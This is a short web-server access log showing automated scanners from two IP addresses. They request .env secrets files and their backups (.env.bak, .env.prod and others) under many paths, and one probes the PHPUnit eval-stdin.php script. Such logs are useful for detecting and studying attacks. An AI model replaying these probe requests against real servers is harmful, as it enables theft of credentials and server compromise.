104.211.220.126 - - [12/Apr/2023:01:40:02 +0000] "GET /vendor/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.211.220.126 - - [12/Apr/2023:01:40:03 +0000] "GET /assets/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.211.220.126 - - [12/Apr/2023:01:40:04 +0000] "GET /storage/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.211.220.126 - - [12/Apr/2023:01:40:05 +0000] "GET /public/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.211.220.126 - - [12/Apr/2023:01:40:06 +0000] "GET /app/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.211.220.126 - - [12/Apr/2023:01:40:06 +0000] "GET /admin/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.211.220.126 - - [12/Apr/2023:01:40:07 +0000] "GET /laravel/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.211.220.126 - - [12/Apr/2023:01:40:08 +0000] "POST / HTTP/1.1" 405 409652 "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.211.220.126 - - [12/Apr/2023:01:40:10 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
178.128.98.161 - - [12/Apr/2023:02:01:40 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
178.128.98.161 - - [12/Apr/2023:02:01:41 +0000] "GET /.env.bak HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
178.128.98.161 - - [12/Apr/2023:02:01:41 +0000] "GET /.env.backup HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
178.128.98.161 - - [12/Apr/2023:02:01:41 +0000] "GET /.env.local HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
178.128.98.161 - - [12/Apr/2023:02:01:42 +0000] "GET /.env.prod HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
178.128.98.161 - - [12/Apr/2023:02:01:42 +0000] "GET /.env.php HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
178.128.98.161 - - [12/Apr/2023:02:01:43 +0000] "GET /.env.save HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
